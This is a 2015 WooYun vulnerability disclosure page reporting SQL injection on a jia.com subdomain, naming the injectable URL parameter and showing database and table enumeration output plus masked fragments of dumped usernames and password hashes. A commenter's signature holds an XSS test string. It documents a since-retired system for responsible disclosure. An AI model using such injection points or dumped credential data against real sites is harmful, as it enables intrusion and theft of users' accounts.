当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137769

漏洞标题:齐家网某站MySQL注射(400多万账号密码)

相关厂商:jia.com

漏洞作者: DloveJ

提交时间:2015-08-29 11:15

修复时间:2015-10-14 11:17

公开时间:2015-10-14 11:17

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-29: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

注射,多张表

详细说明:

"http://city.jia.com/index.php?areaflag=1


1.jpg


available databases [5]:
[*] information_schema
[*] shop
[*] shop_umege
[*] test
[*] test_shop_backup


2.jpg


n_crm_user_bak                     |
| n_crm_waihu_user |
| nanjing_goods |
| nanjing_shop |
| net_feedback_shenyang |
| net_survey_shenyang |
| net_surveyinfo_shenyang |
| new_member |
| new_member_counter |
| new_member_expand |
| new_shop_brand |
| new_shop_detail |
| new_shop_topic |
| newjingjia_fangan |
| newjingjia_gg |
| newjingjia_gg_bak |
| newjingjia_ggset |
| newjingjia_ggset_bak |
| newjingjia_shop_privilege |
| oa_info |
| oa_jiesuan |
| oa_shop |
| offline_order |
| orderGroup |
| order_account |
| order_account_time |
| order_account_windup |
| order_all_mobile |
| order_anrechnen |
| order_anrechnen_bak |
| order_con |
| order_crm_count |
| order_custom |
| order_custom_verify |
| order_goods_option |
| order_goods_option_bak |
| order_items |
| order_items1 |
| order_items_2012shanghai |
| order_items_bak |
| order_items_complete_amount |
| order_items_count |
| order_items_expand |
| order_learn |
| order_log |
| order_lone |
| order_mark |
| order_pay |
| order_pay_list |
| order_post_oa |
| order_process |
| order_qg_goods |
| order_random_yard |
| order_recommend |
| order_recommend_bak |
| order_recommend_money |
| order_recommend_money_bak |
| order_recommend_money_log |
| order_recommend_money_log_bak |
| order_recommend_shop |
| order_recommend_shop_ad |
| order_recommend_shop_ad_bak |
| order_recommend_shop_bak |
| order_recommend_type |
| order_recommend_type_bak |
| order_remark |
| order_remark_admin |
| order_reply_count |
| order_shop_recommend_apply_num |
| order_shop_recommend_apply_num_bak |
| order_sms |
| order_statis |
| order_status_change_log |
| order_track |
| order_tuiding |
| orders |
| orders_ju_log |
| orders_zhongjiang |
| orders_zhongjiang1 |
| orders_zhongjiang3 |
| orders_zhongjiang_2 |
| pay |
| pay_log |
| pay_tax_rate_log |
| pay_user_info |
| payments |
| php2html |
| pick_up_cash |
| pmt_goods |
| pmt_id |
| pmt_test |
| point_detail |
| point_operate |
| points |
| points_2011 |
| pos_pay_list |
| pos_pay_log |
| pos_virtual_order |
| prefer_choice |
| prefer_option |
| prefer_question |
| price_action |
| price_jubao |
| product_ship_fee |
| product_ship_relation |
| promotion_activity |
| promotion_rule |
| push |
| push_img |
| qg_collect_img |
| quick_user_jump_id |
| recommand_name |
| recuit_department |
| recuit_job_place |
| recuit_post |
| recuit_post_info |
| recuit_substa_flash |
| recuit_substa_image |
| recuit_substa_intro |
| refund_info |
| refunds |
| reg_fans |
| regis_user |
| regiss_user |
| reward_action |
| reward_gift |
| reward_pepole |
| role_control |
| scene_order_config |
| scene_order_config_log |
| scene_order_visit_user |
| screditsP01 |
| screditsp |
| screditssP02 |
| screditsuuser |
| sdb_brand |
| sdb_brand1 |
| sdb_brand2 |
| sdb_coupons_p_items |
| sdb_coupons_u_items |
| sdb_delivery |
| sdb_dly_h_area |
| sdb_log |
| sdb_message |
| sdb_pmt_goods_cat |
| sdb_pmt_member_lv |
| sdb_print_tmpl |
| sdb_promotion |
| sdb_promotion_scheme |
| sdb_regions |
| sdb_tag_rel |
| search_item |
| search_keywords |
| search_relation |
| seo |
| server_host |
| settings |
| shippings |
| shop |
| shop20140212 |
| shop3 |
| shop_20110513 |
| shop_20120103 |
| shop_20120105 |
| shop_admin |
| shop_admin_sh_jc |
| shop_announcement |
| shop_bak |
| shop_bak2 |
| shop_bind |
| shop_case |
| shop_cat_relation |
| shop_channel |
| shop_charges |
| shop_comment |
| shop_comment_new |
| shop_comment_new1 |
| shop_comment_wonderful |
| shop_copy120207 |
| shop_expand |
| shop_false |
| shop_flagship_log |
| shop_goods_cat |
| shop_goods_cat_relation |
| shop_guard_run |
| shop_intergrity |
| shop_jiaju |
| shop_jiancai |
| shop_message |
| shop_money |
| shop_money1 |
| shop_money2 |
| shop_money_20111215 |
| shop_money_20111220 |
| shop_money_2012_07 |
| shop_money_bak |
| shop_money_baobiao |
| shop_money_log |
| shop_money_log1 |
| shop_money_log2 |
| shop_money_log_20111214 |
| shop_money_log_20111220 |
| shop_money_log_20120705 |
| shop_money_log_3 |
| shop_money_log_bak |
| shop_pg |
| shop_pg_20110513 |
| shop_pos_relation |
| shop_price_link |
| shop_promotion_candidate |
| shop_promotion_candidate1 |
| shop_promotion_candidate2 |
| shop_promotions |
| shop_promotions1 |
| shop_promotions2 |
| shop_promotions_20110513 |
| shop_promotions_history |
| shop_promotions_history1 |
| shop_promotions_notice |
| shop_promotions_notice1 |
| shop_qg |
| shop_qg_20110513 |
| shop_qg_goods |
| shop_qg_goods_bak |
| shop_qg_goods_bak2 |
| shop_read_announcement |
| shop_recommand |
| shop_reflect |
| shop_service_star |
| shop_sh |
| shop_shenji |
| shop_shenji_bak |
| shop_sms |
| shop_star_point |
| shop_suzhou |
| shop_unit |
| shop_y |
| shopcat_category |
| shopcat_category_bak |
| shopcat_category_bind |
| site_qg |
| site_qg_class |
| sms_kc_reply |
| sph_goods_item_id |
| spx_goods_item |
| spx_goods_item_2 |
| step_detail |
| step_main |
| sub_topic |
| tag_rel |
| tags |
| tags_relation |
| temp_crm2_order_shop_list |
| test |
| test_vote |
| tg_admin_role |
| tg_admin_user |
| topic |
| topic_award |
| topic_knowledge |
| topic_more |
| topic_pro |
| tousu_dindgan |
| tuan |
| tuan_fenlei |
| tuan_igg |
| tuan_sign |
| tuikuan_log |
| tuku_email |
| ucard_profile |
| user_bak20120409 |
| user_bak_20120412 |
| user_confusion |
| user_info |
| user_log |
| user_mobile |
| virtual_cat |
| vote |
| vote_shop |
| vote_shop_category |
| vote_shop_new |
| vote_user_list |
| vote_user_message |
| votive |
| wed_gift |
| wed_gift_post_code |
| wed_notice |
| zhidao_log |
| zhuanti_vote |
| zhuanti_vote_stats |
| zhuanti_vote_value |
+------------------------------------+


mask 区域
*****e: s*****
*****: u*****
*****olu*****
*****----+----*****
***** | Typ*****
*****----+----*****
***** | int*****
***** | dat*****
***** | int*****
***** | var*****
***** | tin*****
*****de | var*****
***** | tin*****
***** | int*****
***** | tin*****
***** | var*****
***** | tim*****
*****e | tim*****
***** | var*****
***** | var*****
***** | tin*****
*****ode | var*****
***** | int*****
***** | var*****
***** | var*****
***** | var*****
***** | var*****
***** | tim*****
***** | var*****
***** | var*****
*****----+----*****


3.jpg


4.jpg


5.jpg


mask 区域
*****ank>	f720bb89fe*****
*****lank> 7bc157b3a*****
*****lank> 1152e97c1*****
*****^^ <blank&gt*****
*****s <blank>*****
*****lank> 7bc157b3ad*****
*****k> 4dd5f835fe57*****
*****;blank> 69*****
*****hayoo <blank&*****
*****blank> 228b7fa80*****
*****顾问 <blank*****
*****ayu <blank&g*****
*****<blank> *****
*****upian <blank&g*****
*****g <blank&gt*****
*****;blank> 0d4eb65b*****
***** <blank> *****
*****lt;blank> 1*****
***** <blank>*****
***** <blank>*****
*****365 <blank&gt*****
*****e <blank&gt*****
*****;blank> 5f*****
*****lt;blank> 0*****
***** <blank>*****
*****^^呆 <blank&*****
*****0sh <blank&g*****
*****lt;blank> 6*****
*****inn <blank&g*****
*****t <blank&gt*****
*****t;blank> f*****
*****jh2002 <blank*****
*****gjue <blank&*****
*****3 <blank>*****
*****<blank>*****
***** <blank> *****
*****an <blank&gt*****
*****<blank> *****
*****t;blank> 5*****
*****<blank>*****
*****l <blank>*****
***** <blank>*****
*****gelaxiao <blan*****
*****keai <blank&*****

漏洞证明:

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-08-31 09:11

厂商回复:

感谢提交! 之前由于人员变更, 都没有进行确认.

最新状态:

2015-09-18:这是旧的系统, 已下线.

2015-10-14:已下线.


漏洞评价:

评论

  1. 2015-08-29 11:30 | 牛 小 帅 ( 普通白帽子 | Rank:403 漏洞数:91 | 什么狗屁爱,生活已乱套!人的一生中,...)

    应该忽略,然后乌云给你15rank

  2. 2015-08-29 11:41 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @牛 小 帅 我倒是希望忽略,然后给15 我是怕她自己给评价个1rank,那就没得玩儿了 哎

  3. 2015-08-31 09:15 | 牛 小 帅 ( 普通白帽子 | Rank:403 漏洞数:91 | 什么狗屁爱,生活已乱套!人的一生中,...)

    @DloveJ 多一个rank 哈哈

  4. 2015-08-31 12:15 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @牛 小 帅 一定是故意的!!←_←